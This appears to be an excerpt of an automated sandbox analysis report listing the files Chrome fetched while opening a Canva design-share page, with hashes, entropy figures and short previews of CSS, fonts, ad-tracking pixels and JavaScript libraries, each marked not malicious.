                                                                Preview:event: message.data: {"send_pixel":["https://ad.doubleclick.net/activity;register_conversion=1;src=9812343;type=conve0;cat=canva008;ord=39425697;gtm=45j91e48l0v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u6=US;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;ps=1;pcor=37337338;s3p=1;~oref=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGOmfvTQik%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor?"],"options":{"attribution_reporting":true}}..event: message.data: {"send_pixel":["https://ad.doubleclick.net/activity;src=9812343;type=conve0;cat=canva008;ord=39425697;gtm=45j91e48l0v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u6=US;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B1
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:Web Open Font Format (Version 2), TrueType, length 38848, version 1.655
                                                                Category:downloaded
                                                                Size (bytes):38848
                                                                Entropy (8bit):7.993669247804477
                                                                Encrypted:true
                                                                SSDEEP:
                                                                MD5:CFF149EE1E9D2BE50AC77BCD86769D05
                                                                SHA1:A1B8A95DDFE811A098D0298E83DD711E90943732
                                                                SHA-256:C84DE7E52D68BD3B651219E7085236BABC85A0C7C79F21A14F0CDDDBD0FB4B4C
                                                                SHA-512:D27E713343F51A75E909B4A01D3F2FFB95EE82E13A1B21A9D3034D3858579E4C3FEBAE76E1AF706B820E51583254281E256B825F1742167E1E072DC59CDF1AE4
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://static.canva.com/web/images/cff149ee1e9d2be50ac77bcd86769d05.woff2
                                                                Preview:wOF2..............%(...L..............................j...?HVAR.^?MVARZ.`?STAT$'(..N/....D.|0....6.$..|..... ..>. [..q..W.....sgtY.....C.m..X=e...`...~9...?-....h[U.t.-.\..Q.zkm..,..k..RP4...%Z#_1q...H...A.P.T.s#..Q...;......[...H|..C....i....AW....V....r..'.....`...$r.C$C$..8&.....]:v\x&N..q..........}..+.Q.$OJ............./.Wdb.a..........}.<....}//..B...BHB.!.K.+.).kT#.J).".Xa,e.JqQDtW..o...R..v.W...........;]..w...........7C0.N.^Q.m.......bAn..c8b...VD..(...Q"Z..y..1...o..O_......L.._.f.&........LC.Z................N....=.Y..]...h.).|....&.1B.....6..].R..3.t)....i........#...`.B.8..D.E\V.(5*...O2..7..93.:.l6.$.B....>._...9..FE.........V.........1...0Al.5g=.....:/...L..3.b......7....... ......j...u...F)......e.g.Xf"C..e...3=..#...y...w...I.@.O.>.J.$........{S.V...e8B.. ."J9..DD."27k"VD..(...}...LHT...a.6-...r..m~.........~.?...NI...!..'F(b.....xb...(."~u...Q..&:.....9#Gm.D....D.&....R|.D..N...:...".......II'.w_#..X...&:..WQ...|...oj...RzP....T|
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (812)
                                                                Category:downloaded
                                                                Size (bytes):875
                                                                Entropy (8bit):5.552508302221604
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:4F1DACAD40802C51508C5ED99C4568FC
                                                                SHA1:A1474213609591E1909441D9844BEA56F9C60243
                                                                SHA-256:195CCD6FB64A8B8C8A9826E03EF4BFFF884130024BEE6AA1F58D75854C895CD1
                                                                SHA-512:E6EE8C0A62929F226C442A2F935E762EAC569663BEDC4767BB08C035A83AE1F320FC258A5F5E62673181653674AF23995B09B94C7B5B318C9A30319E27F6C532
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://static.canva.com/web/07afb9d6d121d0cd.ltr.css
                                                                Preview:.K1vVqw{cursor:inherit;display:inline-block}._9ZZuWA{color:var(--JEAqPw)}.jj2gEQ{border:none;border-bottom:1px solid var(--OuCkCQ);box-sizing:border-box;height:1px;margin:0}.jj2gEQ.KGTzhA{border-bottom:unset;border-right:1px solid var(--OuCkCQ);display:inline-block;height:100%;width:1px}.LNeUZQ{align-items:center;color:var(--JEAqPw);display:flex;flex:1 0;justify-content:space-between;margin:8px 8px 4px;min-width:0}.nMpC2A{margin:0 8px;overflow:hidden;-webkit-user-select:none;user-select:none}.Fs7OfA{min-height:1em}.AChqEA{grid-row-gap:4px;display:grid;list-style:disc;padding-left:16px}.lqHyqQ{display:list-item}.eKnFWA{margin:4px 0 0}._10_OSg{color:var(--5F8MFw)}.RpYbJQ{color:var(--P69qRQ)}.xVxGmw{color:var(--fg0S1Q)}.KBgfJw{color:var(--MRX9rw)}._7VX1NA{color:var(--bk41Zw)}.vSEELQ{word-break:break-all}./*# sourceMappingURL=sourcemaps/07afb9d6d121d0cd.ltr.css.map*/
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (5865)
                                                                Category:downloaded
                                                                Size (bytes):5928
                                                                Entropy (8bit):5.509598271266651
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:AFA18B046CCAB4441787D297FE2EBE43
                                                                SHA1:F93F9CA7515F52F8E83B6D81E152E5046CFE183C
                                                                SHA-256:BA73184496026FAFF988213BF7041092F6499E17AA056D2CDDE8D1FD0C1028B7
                                                                SHA-512:9A4E32BAB51DC9B666E9CA99B5E17777251846C58B095BB7F158292C528ECBC4BAE36A2EAB902B748590AE8A2CB29AC3F195B7DB51FE20DC978F087CF995C1A3
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://static.canva.com/web/1a4a4b5de74c9a37.ltr.css
                                                                Preview:.theme{color-scheme:var(--4h-m_A)}.light{--4h-m_A:light;--Zpa-KA:#00c4cc;--eGVbng:#8b3dff;--M5_pvA:#7731d8;--boKKWg:#612dae;--oqurdw:rgba(64,87,109,.07);--d1p99w:#fff;--17LfHw:rgba(36,49,61,.4);--EgWgfg:rgba(13,18,22,0);--X3--Zg:rgba(64,87,109,.07);--xfy86Q:rgba(57,76,96,.15);--p53f_Q:rgba(13,18,22,0);--REcY5g:#0d1216;--XajtPQ:rgba(36,49,61,.4);--FVk7Ew:rgba(165,112,255,.15);--2-zmYA:rgba(165,112,255,.15);--ySYdsQ:rgba(165,112,255,.2);--aMXh3A:rgba(64,87,109,.07);--_RN1Dg:#612dae;--8fGzbw:rgba(36,49,61,.4);--ob8tTA:rgba(13,18,22,0);--MghLXQ:rgba(64,87,109,.07);--3R4u8w:rgba(57,76,96,.15);--TwiLcg:rgba(13,18,22,0);--QeQ0Dw:#0d1216;--TZOI7A:rgba(36,49,61,.4);--SZMkXA:rgba(165,112,255,.15);--1zesEA:rgba(165,112,255,.15);--AMxRgw:rgba(165,112,255,.2);--BZ60Jw:rgba(64,87,109,.07);--8Ex5gA:#612dae;--spIP2A:rgba(36,49,61,.4);--KtXlRg:rgba(17,23,29,.6);--QADODw:rgba(13,18,22,.7);--kTBxcw:rgba(13,18,22,.86);--HxK_kw:rgba(17,23,29,.6);--6u-yJQ:#fff;--J0YKvA:hsla(0,0%,100%,.7);--yrvb-A:rgba(57,76
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:Web Open Font Format, CFF, length 1136, version 1.0
                                                                Category:downloaded
                                                                Size (bytes):1136
                                                                Entropy (8bit):6.9205301634912555
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:B46630E470F4040EBA7033CF2435EDCE
                                                                SHA1:BA26D2E1DC5BBC01A80446AC65BFFB991953764A
                                                                SHA-256:3E32AEA52247A81C38B4735E84A28BA27B0CBC33F007A1D14E81E64BA766EADD
                                                                SHA-512:EFF809CC87517F9048F1C7A16561EF6F956ED0FE50B3382AFAF111B6F159E769DD88AF0DC0D8A03B748D407C5C554789B6148A137AC700F776A260FD153C0AE7
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://chunk-composing.canva.com/chunk-batch/images/b46630e470f4040eba7033cf2435edce.woff
                                                                Preview:wOFFOTTO...p.......,........................CFF ..............&.FFTM...(...........GDEF.............'..OS/2.......G...`X.b.cmap.......7...B....head...0...3...6...hhea...d.......$...ohmtx... .........H.Hmaxp..............P.name.............r.post........... ...3vhea...D..."...$...$vmtx...h............x.c`d``.b.D&.x~...../.".7W.I..%..b...z....L Q..J.V.x.c`d``V`8.......z...P...5..!.....P.....x.c`fX.8.......i...C..f|.`....e`.d..F.$...........p.......q.P....*q...x...1n.0.E..'..".U.:..9...1Cv......(..z...B.%W....!..>.....<....'S6(.Q...Zy...+..|)/..Ey...4y..3.<.f.8.Yy.W4.95..KX|+.X.&.7x..pD$M.,..;F?...[....c..s..;...N1R.h.PA..|..s..\.d.~BC.q.vcl.u....Nv.lJ'uso.....i/K..^....!..q."u%".....Ai...x.c```f.`..F.......|... ... .........J.F6...|@.....}....x.c`f.....F@......(U....x.E.!O.@.G...\.rl....,$$H._...m2.,. d......s.L".T v.`f..o.[;...S.G...Qt...n.........N.I...(x..\p...U.V;.....%......1...A....[:...{......X.T,...5.."qY(..u.Z.(.kU...c..T.Qn.2F..'&>.U(Ff+7i.O.<<[....*g.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (533), with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):533
                                                                Entropy (8bit):4.933115570682282
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:FEB698008C36A09DFE88AB06A1C3E3B9
                                                                SHA1:A871FBCBBE298AE7078D06627708B2C106A0FAF3
                                                                SHA-256:1C4E7E389D73C6ACF7F19CC812514E71230740791FDE8A018C1D7EDCCF1590AE
                                                                SHA-512:F8E3CA3E49B1C027232D1B3AAB82B5430F4A69334A5E18BEB4469C39D6A24D3F4D3FA4C473F360B619CE734977F0D7EFD03BE6ACB5EB7B9F69295FB2CBF94D9B
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://accounts.google.com/gsi/style
                                                                Preview:#credential_picker_container{border:none;height:330px;position:fixed;right:20px;top:20px;width:391px;z-index:9999}#credential_picker_container iframe{border:none;width:391px;height:330px}#g_a11y_announcement{height:1px;left:-10000px;overflow:hidden;position:absolute;top:auto;width:1px}.L5Fo6c-sM5MNb{border:0;display:block;left:0;position:relative;top:0}.L5Fo6c-bF1uUb{-webkit-border-radius:4px;border-radius:4px;bottom:0;cursor:pointer;left:0;position:absolute;right:0;top:0}.L5Fo6c-bF1uUb:focus{border:none;outline:none}sentinel{}
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (47992), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):47992
                                                                Entropy (8bit):5.605846858683577
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:CF3402D7483B127DED4069D651EA4A22
                                                                SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                                SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                                SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (472)
                                                                Category:dropped
                                                                Size (bytes):531
                                                                Entropy (8bit):4.939378613546915
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:D557AB2563BE5733CE5A7607DDC3F469
                                                                SHA1:8C3C97B8084856D1192F5B3D25D6B19ACAE54FBC
                                                                SHA-256:E58A436E2D664D20A4C32D7C9C1D886A25B2BA4E49EB544D334CCAA0196DA484
                                                                SHA-512:41FBF65B36CA7E508790BAA3326C1446784BCE081B2AD98614DBFF810CD39F4689FAA6FB55EF85CAD299AF2D631E9516F6ACBBC317A31871DCACD3D9271DA6D0
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:window['cmsg']['assets'] = window['cmsg']['assets'] || {};.window['cmsg']['assets']["en"] = Object.assign(window['cmsg']['assets']["en"] || {}, {"158":{"js":["9f45295e288f7b33.strings.js"],"css":[]},"1008":{"js":["b36b728aae62fc54.strings.js"],"css":[]},"2063":{"js":["c285c494d0f11850.strings.js"],"css":[]},"4085":{"js":["fe0857dd958df633.strings.js"],"css":[]},"6037":{"js":["dad3364637d681fb.strings.js"],"css":[]},"8501":{"js":["bfe04665998fe726.strings.js"],"css":[]},"8790":{"js":["dab9fef8f7e65e40.strings.js"],"css":[]}});
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (705)
                                                                Category:downloaded
                                                                Size (bytes):924
                                                                Entropy (8bit):5.550935483680114
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:BD1959D63DD3F269863BF6134E34CE5D
                                                                SHA1:3CE4A0345600BB5F5A77D7BAAA9816834A26B761
                                                                SHA-256:52D1409CBDC71EFC721C52405C13D4731AC77DE957652AC0E77F57B3EB8F178E
                                                                SHA-512:89A960C3A8EC79BDAE20DB0F82DBDFF16DBEAA7B5C9BEBAFFF788322B9D1D72B4AB2227DFE0BF29208F6F708E1DC8312CDDA254B47F6B06F21295A0D0B81BD92
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://static.canva.com/web/f1ddba142f8d8653.js
                                                                Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[1171],{../***/ 237221:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._45f7853dc7660378a038952b53c0953e = self._45f7853dc7660378a038952b53c0953e || {};(function(__c) {var dDa=function(){var a=window;a.addEventListener("dragstart",b=>{null!=b.target&&(b.target instanceof a.HTMLElement&&!1===b.target.draggable||b.target instanceof a.SVGElement)&&(b.preventDefault(),b.stopPropagation())},!0)};__c.eDa=1;__c.fDa=2;__c.Cr=3;__c.gDa=4;__c.Dr=class{next(){return`${this.prefix}${this.Ubb++}`}constructor(a="__id"){this.prefix=a;this.Ubb=0}};var hDa=!1;hDa||"undefined"===typeof window||(dDa(),hDa=!0);__c.Er=1;__c.Fr=2;__c.Gr=3;.}).call(self, self._45f7853dc7660378a038952b53c0953e);}..}]).//# sourceMappingURL=sourcemaps/f1ddba142f8d8653.js.map
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (757)
                                                                Category:downloaded
                                                                Size (bytes):820
                                                                Entropy (8bit):5.5768877329428905
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:F7C439778BAA8DD73CFD4969E7096B6F
                                                                SHA1:2D65E3CA01E8B9894AD9392497104B308A5CC3FB
                                                                SHA-256:4581DD3C24880FDA6BF300CBECA03C05C70F7B0750DF5826FAFE4D52D4C66A4A
                                                                SHA-512:14B8DF63854E37690C4BC042A85B6691B5B6F054CA0E8A20252D54E51E39A3E6EC96D73FB48318F245789AA3D6CFC49C22E8D97B0CEC08D9FA7EA27AF93A0958
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://static.canva.com/web/448a89b1337137b4.ltr.css
                                                                Preview:.dkWypw{align-items:center;box-sizing:border-box;display:inline-flex}.dkWypw:before{content:"\00200B";line-height:1;width:0}.dkWypw>svg{display:block;height:100%;width:100%}.R3BUpw{height:12px;width:12px}.uRWxVA{height:16px;width:16px}.NA_Img{height:24px;width:24px}.JRkz2A{height:32px;width:32px}@keyframes _vsOSw{0%{transform:rotate(0deg)}to{transform:rotate(1turn)}}._6ti9_A{animation:_vsOSw .5s linear infinite}[dir=rtl] .lmfTqA{transform:scaleX(-1)}.RMcv3A{color:var(--VNXpSw)}.M1IlTw{color:var(--5F8MFw)}.EpS93g{color:var(--JEAqPw)}._7_8FQQ{color:var(--P69qRQ)}.Tb7P_g{color:var(--bk41Zw)}.QnQnDA{outline:none}._682gpw{-webkit-touch-callout:none;-webkit-user-drag:none;-webkit-tap-highlight-color:transparent;-webkit-user-select:none;user-select:none}./*# sourceMappingURL=sourcemaps/448a89b1337137b4.ltr.css.map*/
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (1345)
                                                                Category:downloaded
                                                                Size (bytes):1408
                                                                Entropy (8bit):5.488388060478079
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:397D9ECEE0A34EE756936D6A176AED31
                                                                SHA1:61860AE69712D3F1A616FCE6A8BAA14A2B05B747
                                                                SHA-256:CE399A07C0DEF1AAABDBB96FBC86E9677D6764A79AFA952DA8F022A42103C0CD
                                                                SHA-512:AFAC08A3F18260AB6AC933E2CC39C22CA6EF4EF42D0674528612CD21E60F2AE8EA50D73D79B83498D1400A4CF86D22B655CC815F260D83D637592EDA7A33F1D3
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://static.canva.com/web/d571376ab76893d9.ltr.css
                                                                Preview:._0yZ6Qg{text-rendering:geometricPrecision}.aF9o6Q{height:100%}.XfBqww{-webkit-user-select:text;user-select:text}._3tQhmA{overflow:hidden;position:relative;scrollbar-color:rgba(17,23,29,.6) transparent;scrollbar-width:thin;z-index:0}._3tQhmA::-webkit-scrollbar-track{border-radius:4px}._3tQhmA::-webkit-scrollbar-thumb{background-color:rgba(17,23,29,.6);border-radius:4px;visibility:hidden}._3tQhmA:hover::-webkit-scrollbar-thumb{visibility:visible}.XN8TNg{direction:rtl}.aXZ4AQ{height:100%;overflow-y:auto}.aXZ4AQ._4UOq2w{overflow-y:scroll}.Ytfqyg{overflow-x:auto;overscroll-behavior-x:none;width:100%}.Ytfqyg._4UOq2w{overflow-x:scroll}._7LfHaw{height:100%;width:100%}.VV6kWg{display:flex;position:relative}.VV6kWg.mY6Hig{flex-direction:column;height:100%;min-height:0}.VV6kWg.djzRdA{flex-direction:row;min-width:0;width:100%}.x7J7bg{align-items:stretch;display:flex}._7TOhdw{pointer-events:none;z-index:1}._7TOhdw,.c3bmdQ{bottom:0;left:0;overflow:hidden;position:absolute;right:0;top:0}.ENdeHg{box-
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (7824), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):7824
                                                                Entropy (8bit):5.740106256331021
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:9C84376CFE4F471AC039E955076FF04C
                                                                SHA1:8069107966D89AD23D92E3A589E181CA9E9244CE
                                                                SHA-256:6E37E6B61BA4F63CAEE92D3C7614442BB5265EC114D8244A4E8CDDD770BE20AB
                                                                SHA-512:847C65B384E9CB5CCBDA54078C96DAEB1B725AE7F578BD18CE9A7FBF3C33641631E56EBB66FC1D6C6ACDE040229B2F1EB797FCDA9FDF7E3B17E44973AC9A77F6
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:window._cf_chl_opt={cFPWv:'b'};~function(V,g,h,i,j,n,o,A){V=b,function(d,e,U,f,C){for(U=b,f=d();!![];)try{if(C=parseInt(U(236))/1+parseInt(U(233))/2+parseInt(U(169))/3+parseInt(U(216))/4+-parseInt(U(147))/5*(parseInt(U(141))/6)+parseInt(U(198))/7+parseInt(U(144))/8*(-parseInt(U(190))/9),C===e)break;else f.push(f.shift())}catch(D){f.push(f.shift())}}(a,140300),g=this||self,h=g[V(166)],i={},i[V(225)]='o',i[V(156)]='s',i[V(200)]='u',i[V(160)]='z',i[V(202)]='n',i[V(201)]='I',j=i,g[V(139)]=function(C,D,E,F,a0,H,I,J,K,L,M){if(a0=V,D===null||void 0===D)return F;for(H=m(D),C[a0(140)][a0(203)]&&(H=H[a0(157)](C[a0(140)][a0(203)](D))),H=C[a0(162)][a0(228)]&&C[a0(212)]?C[a0(162)][a0(228)](new C[(a0(212))](H)):function(N,a1,O){for(a1=a0,N[a1(235)](),O=0;O<N[a1(218)];N[O+1]===N[O]?N[a1(174)](O+1,1):O+=1);return N}(H),I='nAsAaAb'.split('A'),I=I[a0(183)][a0(177)](I),J=0;J<H[a0(218)];K=H[J],L=l(C,D,K),I(L)?(M='s'===L&&!C[a0(171)](D[K]),a0(138)===E+K?G(E+K,L):M||G(E+K,D[K])):G(E+K,L),J++);return F;funct
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (13567)
                                                                Category:downloaded
                                                                Size (bytes):13630
                                                                Entropy (8bit):5.706217891365475
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:8B8962EAC4297C5FDD49E27D13BC82A1
                                                                SHA1:14EA1FD5F82A4B7429E17C35DB1E8B054850E080
                                                                SHA-256:B84A72A82E970A7401BFDF36697A721B230268A84AC8486636863948E1A2A325
                                                                SHA-512:8ED42426D377F24A49F7237FDA4DC2EE52FD4505E10AD1AAB02A24A684D32552313B28D9D8275CB10B58B13A280B3FE0A41DD5D12DB34A69C7E7B4D09F34809B
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://static.canva.com/web/45ee94828bc36fc1.ltr.css
                                                                Preview:._pFsfA{clip:rect(1px,1px,1px,1px);border:0;font-size:0;height:1px;left:0;margin:-1px;overflow:hidden;padding:0;position:absolute;top:0;white-space:nowrap;width:1px}.R5PmNg{display:block}.E_qVWQ{display:grid;height:100%}.UKsLwg{--17YzSQ:0px;--xeaNQA:var(--17YzSQ);--xcoU8A:var(--xeaNQA);--IBjJew:var(--xcoU8A);--Zmp1yg:var(--xeaNQA);--oWMEjQ:var(--Zmp1yg);--enqzkQ:var(--oWMEjQ);--mXF-kA:var(--enqzkQ);--qJ8urg:var(--oWMEjQ);--pow8nA:var(--qJ8urg);--N0i5Lg:var(--IBjJew);--Pc7Jzg:var(--N0i5Lg);--Do1jQA:var(--IBjJew);--XW9fZQ:var(--Do1jQA);margin:calc(var(--mXF-kA)*-1) calc(var(--XW9fZQ)*-1) calc(var(--pow8nA)*-1) calc(var(--Pc7Jzg)*-1)}@media (min-width:600px){.UKsLwg{--hTPzqg:var(--17YzSQ);--xeaNQA:var(--hTPzqg);--rdNPYg:var(--xcoU8A);--IBjJew:var(--rdNPYg);--NkI86w:var(--Zmp1yg);--oWMEjQ:var(--NkI86w);--CsNzVA:var(--enqzkQ);--mXF-kA:var(--CsNzVA);--qUUtQg:var(--qJ8urg);--pow8nA:var(--qUUtQg);--AM2f2g:var(--N0i5Lg);--Pc7Jzg:var(--AM2f2g);--3BybqQ:var(--Do1jQA);--XW9fZQ:var(--3BybqQ)}}@medi
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):2725
                                                                Entropy (8bit):4.001613792451738
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:749002F5A04F784CC1802D77D2FED423
                                                                SHA1:A82F9B14C9946185D475C946B2EA4B1D724732F7
                                                                SHA-256:E26E8402DEA748478ED971DD8F9626BBC25CEC4776D92A0B768D71A109F82C87
                                                                SHA-512:883CD33B1406E297B068E93CA509E38A54197BC426766AEF6F79D66BCDA96C172E144D302AF174D2D1FEB58091F9FA13139D80B65B9068D58D0A47F83999E9EB
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://static.canva.com/web/images/749002f5a04f784cc1802d77d2fed423.svg
                                                                Preview:<svg width="60" height="60" viewBox="0 0 60 60" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M19.808 31.921c0 .963.252 1.612.895 1.612 1.102 0 2.189-2.995 2.189-4.692 0-.762-.202-1.387-.729-1.387-1.211 0-2.355 2.797-2.355 4.467zm22.347-5.011c0 .55.139 1.172.521 1.629.172-.501.415-1.502.415-2.184 0-.408-.09-.701-.388-.701-.3 0-.548.574-.548 1.255zm4.603 5.011c0 .868.252 1.612.891 1.612 1.12 0 2.19-2.995 2.19-4.692 0-.77-.19-1.387-.717-1.387-1.221 0-2.364 2.853-2.364 4.467z" fill="#fff"/><path fill-rule="evenodd" clip-rule="evenodd" d="M60 30c0 16.569-13.431 30-30 30C13.431 60 0 46.569 0 30 0 13.431 13.431 0 30 0c16.569 0 30 13.431 30 30zm-6.515 1.462c.035-.106.106-.16.186-.16.178 0 .329.217.329.569 0 1.333-1.38 2.956-2.968 2.956-1.016 0-1.567-.726-1.783-1.724-.655 1.108-1.51 1.736-2.568 1.736-.972 0-2.097-.66-2.097-3.024 0-.818.174-1.638.468-2.388-.694.492-1.42.507-1.9.445-1.228 2.547-3.258 4.95-4.4 4.95-.928 0-1.524-1.751-1.799-3.92-.88 2.323-2.198 3.91-3.495 3.91-1.17 0-1.7
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:Unicode text, UTF-8 text, with very long lines (65480)
                                                                Category:downloaded
                                                                Size (bytes):312920
                                                                Entropy (8bit):5.618260926405445
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:88E5A21330199549AED63AC5760A3D03
                                                                SHA1:493FE0B87EE2AD9858433D9C58AEB69049DEACB0
                                                                SHA-256:E5175FC1612041B8F474F778B0CC51E0A1211F993B492BD0C9C6A4417F989DE6
                                                                SHA-512:56AFCE1B9622B5537CBF774C1B4A94AB49A8825D9D46ADA63E0E69BD961937B637531DBCD6BB5473270CE33C9B207A0F6D61C372EBBEC7CDB4BD85D914969C8D
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://chunk-composing.canva.com/chunk-batch/c29f4fac64f3f41d.vendor.js+03c988453743e102.js+48db2a0c18213038.js+69da202c3cccc13a.js+cbbb27807d9b2a2b.js+017211d524731221.js+ccc31f11801b86ee.js+bccee10b49e7edff.js+17c939a0fad357ec.js+2e33802554307a6a.js+7bb53b85b5358c5c.js+5d38be9d67ff0447.js+a0449e6c1a2804bc.js+1b965f401e56238c.js+28f364abb8793c4d.js+59f089c5bc7f158d.js
                                                                Preview:;// __FILE_CONTENT_FOR__:c29f4fac64f3f41d.vendor.js."use strict";(self.webpackChunk_canva_web=self.webpackChunk_canva_web||[]).push([[5136],{94368:(t,e,i)=>{i.d(e,{Z:()=>s});const s={Tn:function(t){const e=(t+"=".repeat((4-t.length%4)%4)).replace(/\-/g,"+").replace(/_/g,"/"),i=atob(e),s=new Uint8Array(i.length);for(let n=0;n<i.length;++n)s[n]=i.charCodeAt(n);return s}}},412730:(t,e,i)=>{i.d(e,{G:()=>s});const s={CustomEvent:"ce",Pr:"p",_u:"pc",vc:"ca",Ea:"i",qs:"ie",M:"cci",R:"ccic",I:"ccc",F:"ccd",ql:"ss",xl:"se",Oi:"si",Ei:"sc",Gi:"sbc",Cc:"sfe",mo:"iec",Uu:"lr",zu:"uae",O:"ci",$:"cc",Ju:"lcaa",Eu:"lcar",On:"inc",Ln:"add",Rn:"rem",$n:"set",Bn:"ncam",Ku:"sgu",Fr:"ffi"}},657070:(t,e,i)=>{i.d(e,{Z:()=>s});const s={W:function(){const t=(t=!1)=>{const e=(Math.random().toString(16)+"000000000").substr(2,8);return t?"-"+e.substr(0,4)+"-"+e.substr(4,4):e};return t()+t(!0)+t(!0)+t()}}},945522:(t,e,i)=>{i.d(e,{Z:()=>s});class s{constructor(t,e){this.database=t,this.vd=e,this.parent="undefined"
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (349)
                                                                Category:downloaded
                                                                Size (bytes):412
                                                                Entropy (8bit):5.212155008501589
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:03CB0CCE71D4259BCBAFDF3CF14700AA
                                                                SHA1:6B46C09BF6A9485E82B9C56E4A046BDEF6748AEC
                                                                SHA-256:CF02B5817E5AAA2FAD5C8835996F56D0C2B0CC2C4DA524B0D76591B3791316E4
                                                                SHA-512:59C81DB489250824D766CCF6828D068A1750FD7858F9CFAD485BB8E1D2F7B20E8ACBA273B231602986F658DDABEC8F1CAE3231DF3A605AECEC0E21988CD1E220
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://static.canva.com/web/fed228293e49d2e2.ltr.css
